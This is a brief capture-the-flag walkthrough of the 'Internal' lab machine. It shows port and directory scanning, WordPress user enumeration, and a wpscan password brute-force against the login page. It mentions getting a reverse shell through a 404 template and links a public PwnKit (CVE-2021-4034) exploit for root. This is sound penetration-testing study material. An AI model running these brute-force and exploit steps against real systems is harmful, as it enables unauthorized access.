rustscan
1 | rustscan -a 10.10.155.73 --ulimit 5000 |
Gobuster
1 | gobuster dir -u http://10.10.155.73/ -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt |
/etc/hosts
1 | 10.10.155.73 internal.thm |
Wordpress
1 | wpscan --url http://internal.thm/blog --enumerate u |
WordPress version 5.4.2
bruteforce
1 | wpscan -v -U admin -P Documents/arch_doc/CTF/Wordlist/rockyou.txt --url http://internal.thm/blog/wp-login.php |
Useless
Reversehell
via error 404 of template
LSE
Polkit CVE, no need to think, let’s pwn it.
Plokit
https://github.com/joeammond/CVE-2021-4034
I’m root
Conclusion
This box was “hard” but still easier than easy box of HTB.